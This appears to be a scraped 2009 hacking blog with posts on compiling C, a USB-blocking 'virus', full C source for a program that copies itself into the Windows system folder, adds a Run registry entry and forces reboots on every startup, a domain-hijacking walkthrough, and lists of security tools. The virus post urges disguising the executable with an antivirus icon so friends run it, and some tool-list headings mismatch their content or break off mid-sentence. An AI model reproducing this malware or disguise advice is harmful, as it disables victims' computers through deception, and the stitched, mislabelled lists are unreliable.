C:\Borland\BCC55\Bin

2. Now goto command prompt (Start->Run->type cmd->Enter)

3. Make the following path as the present working directory (use CD command)

C:\Borland\BCC55\Bin

4. To compile the file (example.c) use the following command

bcc32 example.c

5. Now if there exists no error in the source code you’ll get an executable file (example.exe) in the same location (C:\Borland\BCC55\Bin).

6. Now you have successfully compiled the source code into an executable file(.exe file).

NOTE: The above tutorial assumes that you’ve installed the compiler onto the C: drive (by default).

2009-09-25T08:19:00.000-07:00

A Virus Program to Disable USB Ports

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.

Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download.

http://multisoftware-worldwide.blogspot.com

You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

1. Download the USB_Block.rar file on to your computer.

2. It contains the following 4 files.

block_usb.c (source code)
unblock_usb.c (source code)

3. You need to compile them before you can run it. A step-by-step procedure to compile C programs - How to Compile C Programs.

3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.

2009-09-25T08:18:00.000-07:00

Virus Program to Restart the Computer at Every Startup

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C.

http://multisoftware-worldwide.blogspot.com

So if you are familiar with C language then it’s too easy to understand the logic behind the coding.

Here is the source code.

#include
#include
#include

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(”C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(”C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(”D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(”E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(”F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(”F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(”C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen(”D:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(”E:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:
target=fopen(”F:\\windows\\system\\sysres.exe”,”wb”);
system(”REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system(”shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}

NOTE: COMMENTS ARE GIVEN IN GREEN COLOUR.

Compiling The Scource Code Into Executable Virus.

1. Download the Source Code Here
2. The downloaded file will be Sysres.C
3. For step-by-step compilation guide, How to compile C Programs .

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.

1. Reboot your computer in the SAFE MODE
2. Goto X:\Windows\System (X can be C,D,E or F)
3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.

Logic Behind The Working Of The Virus

If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments.

LOGIC:
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System
3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.

AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)

After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.

2009-09-25T08:14:00.000-07:00

Domain Hijacking – How to Hijack a Domain

In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.

Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).

The operation of domain name is as follows

Any website say for example gohacking.com consists of two parts. The domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.

1. After registering a new domain name, we get a control panel where in we can have a full control of the domain.

2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.

For a clear understanding let me take up a small example.

John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.

What happens when a domain is hijacked

Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.

For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).

In this case the John’s domain name (abc.com) is said to be hijacked.

How the domain names are hijacked

To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients

1. The domain registrar name for the target domain.

2. The administrative email address associated with the target domain.

These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.

To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.

The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.

Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel.

http://multisoftware-worldwide.blogspot.com

After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.

How to protect the domain name from being hijacked

The best way to protect the domain name is to protect the administrative email account associated with the domain. If you loose this email account, you loose your domain. So refer my previous post on how to protect your email account from being hacked. Another best way to protect your domain is to go for private domain registration. When you register a domain name using the private registration option, all your personal details such as your name, address, phone and administrative email address are hidden from the public. So when a hacker performs a WHOIS lookup for you domain name, he will not be able to find your name, phone and administrative email address. So the private registration provides an extra security and protects your privacy. Private domain registration costs a bit extra amount but is really worth for it’s advantages. Every domain registrar provides an option to go for private registration, so when you purchase a new domain make sure that you select the private registration option.

2009-09-25T08:13:00.000-07:00

Top 5 Intrusion Detection Systems

Snort : Everyone's favorite open source IDS
This lightweight network intrusion detection and prevention system excels at traffic analysis and packet logging on IP networks. Through protocol analysis, content searching, and various pre-processors, Snort detects thousands of worms, vulnerability exploit attempts, port scans, and other suspicious behavior. Snort uses a flexible rule-based language to describe traffic that it should collect or pass, and a modular detection engine. Also check out the free Basic Analysis and Security Engine (BASE), a web interface for analyzing Snort alerts.

Open source Snort works fine for many individuals, small businesses, and departments. Parent company SourceFire offers a complimentary product line with more enterprise-level features and real-time rule updates. They offer a free (with registration) 5-day-delayed rules feed, and you can also find many great free rules at Bleeding Edge Snort.

OSSEC HIDS : An Open Source Host-based Intrusion Detection System
OSSEC HIDS performs log analysis, integrity checking, rootkit detection, time-based alerting and active response. In addition to its IDS functionality, it is commonly used as a SEM/SIM solution. Because of its powerful log analysis engine, ISPs, universities and data centers are running OSSEC HIDS to monitor and analyze their firewalls, IDSs, web servers and authentication logs.

Fragroute/Fragrouter : A network intrusion detection evasion toolkit
Fragrouter is a one-way fragmenting router - IP packets get sent from the attacker to the Fragrouter, which transforms them into a fragmented data stream to forward to the victim. Many network IDS are unable or simply don't bother to reconstruct a coherent view of the network data (via IP fragmentation and TCP stream reassembly), as discussed in this classic paper.
http://multisoftware-worldwide.blogspot.com
Fragrouter helps an attacker launch IP-based attacks while avoiding detection. It is part of the NIDSbench suite of tools by Dug Song. Fragroute is a similar tool which is also by Dug Song.

BASE : The Basic Analysis and Security Engine
BASE is a PHP-based analysis engine to search and process a database of security events generated by various IDSs, firewalls, and network monitoring tools. Its features include a query-builder and search interface for finding alerts matching different patterns, a packet viewer/decoder, and charts and statistics based on time, sensor, signature, protocol, IP address, etc.

Sguil : The Analyst Console for Network Security Monitoring
Sguil (pronounced sgweel) is built by network security analysts for network security analysts. Sguil's main component is an intuitive GUI that provides realtime events from Snort/barnyard. It also includes other components which facilitate the practice of Network Security Monitoring a

2009-09-25T08:12:00.000-07:00

Top 5 Wireless Tools

Kismet : A powerful wireless sniffer
Kismet is an console (ncurses) based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing (as opposed to more active tools such as NetStumbler), and can even decloak hidden (non-beaconing) networks if they are in use. It can automatically detect network IP blocks by sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump compatible format, and even plot detected networks and estimated ranges on downloaded maps. As you might expect, this tool is commonly used for wardriving. Oh, and also warwalking, warflying, and warskating, ...

NetStumbler : Free Windows 802.11 Sniffer
Netstumbler is the best known Windows tool for finding open wireless access points ("wardriving"). They also distribute a WinCE version for PDAs and such named Ministumbler. The tool is currently free but Windows-only and no source code is provided. It uses a more active approach to finding WAPs than passive sniffers such as Kismet or KisMAC.

Aircrack : The fastest available WEP/WPA cracking tool
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force.
http://multisoftware-worldwide.blogspot.com
The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

Airsnort : 802.11 WEP Encryption Cracking Tool
AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the Shmoo Group and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar Aircrack.

KisMAC : A A GUI passive wireless stumbler for Mac OS X
This popular stumbler for Mac OS X offers many of the features of its namesake Kismet, though the codebase is entirely different. Unlike console-based Kismet, KisMAC offers a pretty GUI and was around before Kismet was ported to OS X. It also offers mapping, Pcap-format import and logging, and even some decryption and deauthentication attacks.

2009-09-25T08:09:00.000-07:00

Top 6 Traffic Monitoring Tools

Ntop : A network traffic usage monitor
Ntop shows network usage in a way similar to what top does for processes. In interactive mode, it displays the network status on the user's terminal. In Web mode, it acts as a Web server, creating an HTML dump of the network status. It sports a NetFlow/sFlow emitter/collector, an HTTP-based client interface for creating ntop-centric monitoring applications, and RRD for persistently storing traffic statistics.

Ngrep : Convenient packet matching & display
ngrep strives to provide most of GNU grep's common features, applying them to the network layer. ngrep is a pcap-aware tool that will allow you to specify extended regular or hexadecimal expressions to match against data payloads of packets. It currently recognizes TCP, UDP and ICMP across Ethernet, PPP, SLIP, FDDI, Token Ring and null interfaces, and understands bpf filter logic in the same fashion as more common packet sniffing tools, such as tcpdump and snoop.

EtherApe : EtherApe is a graphical network monitor for Unix modeled after etherman
Featuring link layer, IP and TCP modes, EtherApe displays network activity graphically with a color coded protocols display. Hosts and links change in size with traffic. It supports Ethernet, FDDI, Token Ring, ISDN, PPP and SLIP devices. It can filter traffic to be shown, and can read traffic from a file as well as live from the network.

SolarWinds : A plethora of network discovery/monitoring/attack tools
SolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators.
http://multisoftware-worldwide.blogspot.com
Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more.

Nagios : An open source host, service and network monitoring program
Nagios is a system and network monitoring application. It watches hosts and services that you specify, alerting you when things go bad and when they get better. Some of its many features include monitoring of network services (smtp, pop3, http, nntp, ping, etc.), monitoring of host resources (processor load, disk usage, etc.), and contact notifications when service or host problems occur and get resolved (via email, pager, or user-defined method).

Argus : A generic IP network transaction auditing tool
Argus is a fixed-model Real Time Flow Monitor designed to track and report on the status and performance of all network transactions seen in a data network traffic stream. Argus provides a common data format for reporting flow metrics such as connectivity, capacity, demand, loss, delay, and jitter on a per transaction basis. The record format that Argus uses is flexible and extensible, supporting generic flow identifiers and metrics, as well as applicati

2009-09-25T08:08:00.000-07:00

Top 2 Traceroute Tools

Firewalk : Advanced traceroute
Firewalk employs traceroute-like techniques to analyze IP packet responses to determine gateway ACL filters and map networks. This classic tool was rewritten from scratch in October 2002. Note that much or all of this functionality can also be performed by the Hping2 --traceroute option.

Tcptraceroute : A traceroute implementation using TCP packets
The problem is that with the widespread use of firewalls on the modern Internet, many of the packets that the conventional traceroute(8) sends out (ICMP echo or UDP) end up being filtered, making it impossible to completely trace the path to the destination. However, in many cases, these firewalls will permit inbound TCP packets to specific ports that hosts sitting behind the firewall are listening for connections on.
http://multisoftware-worldwide.blogspot.com
By sending out TCP SYN packets instead of UDP or ICMP ECHO packets, tcptraceroute is able to bypass the most common firewall filters.

2009-09-25T08:07:00.000-07:00

Top 3 Vulnerability Exploitation Tools

Metasploit Framework : Hack the Planet
Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. It ships with hundreds of exploits, as you can see in their online exploit building demo. This makes writing your own exploits easier, and it certainly beats scouring the darkest corners of the Internet for illicit shellcode of dubious quality. Similar professional exploitation tools, such as Core Impact and Canvas already existed for wealthy users on all sides of the ethical spectrum. Metasploit simply brought this capability to the masses.

Core Impact : An automated, comprehensive penetration testing product
Core Impact isn't cheap (be prepared to spend tens of thousands of dollars), but it is widely considered to be the most powerful exploitation tool available.
http://multisoftware-worldwide.blogspot.com
It sports a large, regularly updated database of professional exploits, and can do neat tricks like exploiting one machine and then establishing an encrypted tunnel through that machine to reach and exploit other boxes. If you can't afford Impact, take a look at the cheaper Canvas or the excellent and free Metasploit Framework. Your best bet is to use all three.

Also categorized as: vulnerability scanners

Canvas : A Comprehensive Exploitation Framework
Canvas is a commercial vulnerability exploitation tool from Dave Aitel's ImmunitySec. It includes more than 150 exploits and is less expensive than Core Impact, though it still costs thousands of dollars. You can also buy the optional VisualSploit Plugin for drag and drop GUI exploit creation. Zero-day exploits can occasionally be found within Canvas.

2009-09-25T08:06:00.000-07:00

Top 11 Packet Sniffers

Wireshark : Sniffing the glue that holds the Internet together
Wireshark (known as Ethereal until a trademark dispute in Summer 2006) is a fantastic open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk. You can interactively browse the capture data, delving down into just the level of packet detail you need. Wireshark has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session. It also supports hundreds of protocols and media types. A tcpdump-like console version named tethereal is included. One word of caution is that Ethereal has suffered from dozens of remotely exploitable security holes, so stay up-to-date and be wary of running it on untrusted or hostile networks (such as security conferences).

Tcpdump : The classic sniffer for network monitoring and data acquisition
Tcpdump is the IP sniffer we all used before Ethereal (Wireshark) came on the scene, and many of us continue to use it frequently. It may not have the bells and whistles (such as a pretty GUI or parsing logic for hundreds of application protocols) that Wireshark has, but it does the job well and with fewer security holes. It also requires fewer system resources. While it doesn't receive new features often, it is actively maintained to fix bugs and portability problems. It is great for tracking down network problems or monitoring activity. There is a separate Windows port named WinDump. TCPDump is the source of the Libpcap/WinPcap packet capture library, which is used by Nmap among many other tools.

Cain and Abel : The top password recovery tool for Windows
UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. It is also well documented.

Ettercap : In case you still thought switched LANs provide much extra security
Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It supports active and passive dissection of many protocols (even ciphered ones, like ssh and https). Data injection in an established connection and filtering on the fly is also possible, keeping the connection synchronized. Many sniffing modes were implemented to give you a powerful and complete sniffing suite. Plugins are supported. It has the ability to check whether you are in a switched LAN or not, and to use OS fingerprints (active or passive) to let you know the geometry of the LAN.

Dsniff : A suite of powerful network auditing and penetration-testing tools
This popular and well-engineered suite by Dug Song includes many tools. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.). arpspoof, dnsspoof, and macof facilitate the interception of network traffic normally unavailable to an attacker (e.g, due to layer-2 switching). sshmitm and webmitm implement active monkey-in-the-middle attacks against redirected ssh and https sessions by exploiting weak bindings in ad-hoc PKI.
http://multisoftware-worldwide.blogspot.com
A separately maintained partial Windows port is available here. Overall, this is a great toolset. It handles pretty much all of your password sniffing needs.

#10

#11

2009-09-25T08:05:00.000-07:00

Top 4 Rootkit Detectors

1	Superscan : A Windows-only port scanner, pinger, and resolver SuperScan is a free Windows-only closed-source TCP/UDP port scanner by Foundstone. It includes a variety of additional networking tools such as ping, traceroute, http head, and whois.

Angry IP Scanner : IP address and port scanner
Angry IP Scanner is a small open source Java application which performs host discovery ("ping scan") and port scans. The old 2.x release was Windows-only, but the new 3.X series runs on Linux, Mac, or Windows as long as Java is installed. Version 3.X omits the vampire zebra logo. As with all connect()-based scanners, performance on Windows XP SP2 and Vista can be poor due to limitations added to tcpip.sys. The Angry FAQ provides details and workarounds. A short review was posted to nmap-dev.

Unicornscan : Not your mother's port scanner
Unicornscan is an attempt at a User-land Distributed TCP/IP stack for information gathering and correlation. It is intended to provide a researcher a superior interface for introducing a stimulus into and measuring a response from a TCP/IP enabled device or network.
http://multisoftware-worldwide.blogspot.com
Some of its features include asynchronous stateless TCP scanning with all variations of TCP flags, asynchronous stateless TCP banner grabbing, and active/passive remote OS, application, and component identification by analyzing responses. Like Scanrand, it isn't for the faint of heart.

Scanrand : An unusually fast stateless network service and topology discovery system
Scanrand is a stateless host-discovery and port-scanner similar in design to Unicornscan. It trades off reliability for amazingly fast speeds and uses cryptographic techniques to prevent attackers from manipulating scan results. This utility is a part of a software package called Paketto Keiretsu, which was written by Dan Kaminsky. Scanrand and Paketto are no longer actively maintained, but the latest released version can still be found at DoxPara.Com.

2009-09-25T08:02:00.000-07:00

Top 4 Packet Crafting Tools

Hping2 : A network probing utility like ping on steroids
This handy little utility assembles and sends custom ICMP, UDP, or TCP packets and then displays any replies. It was inspired by the ping command, but offers far more control over the probes sent. It also has a handy traceroute mode and supports IP fragmentation. This tool is particularly useful when trying to traceroute/ping/probe hosts behind a firewall that blocks attempts using the standard utilities.
http://multisoftware-worldwide.blogspot.com
This often allows you to map out firewall rulesets. It is also great for learning more about TCP/IP and experimenting with IP protocols.

Scapy : Interactive packet manipulation tool
Scapy is a powerful interactive packet manipulation tool, packet generator, network scanner, network discovery tool, and packet sniffer. It provides classes to interactively create packets or sets of packets, manipulate them, send them over the wire, sniff other packets from the wire, match answers and replies, and more. Interaction is provided by the Python interpreter, so Python programming structures can be used (such as variables, loops, and functions). Report modules are possible and easy to make.

Nemesis : Packet injection simplified
The Nemesis Project is designed to be a commandline-based, portable human IP stack for UNIX/Linux (and now Windows!). The suite is broken down by protocol, and should allow for useful scripting of injected packet streams from simple shell scripts. If you enjoy Nemesis, you might also want to look at Hping2 as they complement each other well.

Yersinia : A multi-protocol low-level attack tool
Yersinia is a low-level protocol attack tool useful for penetration testing. It is capable of many diverse attacks over multiple protocols, such as becoming the root role in the Spanning Tree (Spanning Tree Protocol), creating virtual CDP (Cisco Discovery Protocol) neighbors, becoming the active router in a HSRP (Hot Standby Router Protocol) scenario, faking DHCP replies, an

2009-09-25T08:01:00.002-07:00

Top 2 Disassemblers

Each tool is described by one ore more attributes:


	Generally costs money. A free limited/demo/trial version may be available.
	Works natively on Linux
	Works natively on OpenBSD, FreeBSD, Solaris, and/or other UNIX variants
	Works natively on Apple Mac OS X
	Works natively on Microsoft Windows
	Features a command-line interface
	Offers a GUI (point and click) interface
	Source code available for inspection.

IDA Pro : A Windows or Linux disassembler and debugger
Disassembly is a big part of security research. It will help you dissect that Microsoft patch to discover the silently fixed bugs they don't tell you about, or more closely examine a server binary to determine why your exploit isn't working. Many disassemblers are available, but IDA Pro has become the de-facto standard for the analysis of hostile code and vulnerability research. This interactive, programmable, extensible, multi-processor disassembler now supports Linux (console mode) as well as Windows.

OllyDbg : An assembly level Windows debugger
OllyDbg is a 32-bit assembler level analyzing debugger for Microsoft Windows. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable. OllyDbg features an intuitive user interface, advanced code analysis capable of recognizing procedures, loops, API calls, switches, tables, constants and strings, an ability to attach to a running program, and good multi-thread support. OllyDbg is free to download and use but no source code is provided.

2009-09-25T08:01:00.001-07:00

Top 4 Application-Specific Scanners

Each tool is described by one ore more attributes:


	Generally costs money. A free limited/demo/trial version may be available.
	Works natively on Linux
	Works natively on OpenBSD, FreeBSD, Solaris, and/or other UNIX variants
	Works natively on Apple Mac OS X
	Works natively on Microsoft Windows
	Features a command-line interface
	Offers a GUI (point and click) interface
	Source code available for inspection.

THC Amap : An application fingerprinting scanner
Amap is a great tool for determining what application is listening on a given port. Their database isn't as large as what Nmap uses for its version detection feature, but it is definitely worth trying for a 2nd opinion or if Nmap fails to detect a service. Amap even knows how to parse Nmap output files. This is yet another valuable tool from the great guys at THC.

Nbtscan : Gathers NetBIOS info from Windows networks
NBTscan is a program for scanning IP networks for NetBIOS name information (similar to what the Windows nbtstat tool provides against single hosts). It sends a NetBIOS status query to each address in a supplied range and lists received information in human readable form. For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address. The original nbtscan was written by Alla Bezroutchko. Steve Friedl has written an alternate implementation.

Ike-scan : VPN detector/scanner
Ike-scan exploits transport characteristics in the Internet Key Exchange (IKE) service, the mechanism used by VPNs to establish a connection between a server and a remote client. It scans IP addresses for VPN servers by sending a specially crafted IKE packet to each host within a network. Most hosts running IKE will respond, identifying their presence. The tool then remains silent and monitors retransmission packets. These retransmission responses are recorded, displayed and matched against a known set of VPN product fingerprints. Ike-scan can VPNs from manufacturers including Checkpoint, Cisco, Microsoft, Nortel, and Watchguard.

#4	SPIKE Proxy : HTTP Hacking Spike Proxy is an open source HTTP proxy for finding security flaws in web sites. It is part of the Spike Application Testing Suite and supports automated SQL injection detection, web site crawling, login form brute forcing, overflow detection, and

2009-09-25T07:59:00.000-07:00

Top 6 Encryption Tools

Each tool is described by one ore more attributes:


	Generally costs money. A free limited/demo/trial version may be available.
	Works natively on Linux
	Works natively on OpenBSD, FreeBSD, Solaris, and/or other UNIX variants
	Works natively on Apple Mac OS X
	Works natively on Microsoft Windows
	Features a command-line interface
	Offers a GUI (point and click) interface
	Source code available for inspection.

GnuPG / PGP : Secure your files and communication w/advanced encryption
PGP is the famous encryption program by Phil Zimmerman which helps secure your data from eavesdroppers and other risks. GnuPG is a very well-regarded open source implementation of the PGP standard (the actual executable is named gpg). While GnuPG is always free, PGP costs money for some uses.

OpenSSL : The premier SSL/TLS encryption library
The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured, and open source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library. The project is managed by a worldwide community of volunteers that use the Internet to communicate, plan, and develop the OpenSSL toolkit and its related documentation.

Tor : An anonymous Internet communication system
Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, irc, ssh, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features. For a free cross-platform GUI, users recommend Vidalia

Stunnel : A general-purpose SSL cryptographic wrapper
The stunnel program is designed to work as an SSL encryption wrapper between remote client and local (inetd-startable) or remote server. It can be used to add SSL functionality to commonly used inetd daemons like POP2, POP3, and IMAP servers without any changes in the programs' code. It will negotiate an SSL connection using the OpenSSL or SSLeay libraries.

OpenVPN : A full-featured SSL VPN solution
OpenVPN is an open-source SSL VPN package which can accommodate a wide range of configurations, including remote access, site-to-site VPNs, WiFi security, and enterprise-scale remote access solutions with load balancing, failover, and fine-grained access-controls. OpenVPN implements OSI layer 2 or 3 secure network extension using the industry standard SSL/TLS protocol, supports flexible client authentication methods based on certificates, smart cards, and/or 2-factor authentication, and allows user or group-specific access control policies using firewall rules applied to the VPN virtual interface. OpenVPN uses OpenSSL as its primary cryptographic library.

TrueCrypt : Open-Source Disk Encryption Software for Windows and Linux
TrueCrypt is an excellent open source disk encryption system. Users can encrypt entire filesystems, which are then on-the-fly encrypted/decrypted as needed without user intervention beyond entering their passphrase intially. A clever hidden volume feature allows you to hide a 2nd layer of particularly sensitive content with plausible deniability about whether it exists. Then if you are forced to give up your passphrase, you give them the first-level secret. Even with that, attackers cannot prove that a second level key even exists.

2009-09-25T07:58:00.000-07:00

Top 10 Password Crackers

Each tool is described by one ore more attributes:


	Generally costs money. A free limited/demo/trial version may be available.
	Works natively on Linux
	Works natively on OpenBSD, FreeBSD, Solaris, and/or other UNIX variants
	Works natively on Apple Mac OS X
	Works natively on Microsoft Windows
	Features a command-line interface
	Offers a GUI (point and click) interface
	Source code available for inspection.

Please send updates and suggestions (or better tool logos) to Fyodor. If your tool is featured or you think your site visitors might enjoy this list, you are welcome to use our link banners. Here is the list, starting with the most popular:

John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker
John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes. Several other hash types are added with contributed patches. You will want to start with some wordlists, which you can find here, here, or here.

THC Hydra : A Fast network authentication cracker which supports many different services
When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more. Like THC Amap this release is from the fine folks at THC.

Aircrack : The fastest available WEP/WPA cracking tool
Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files).

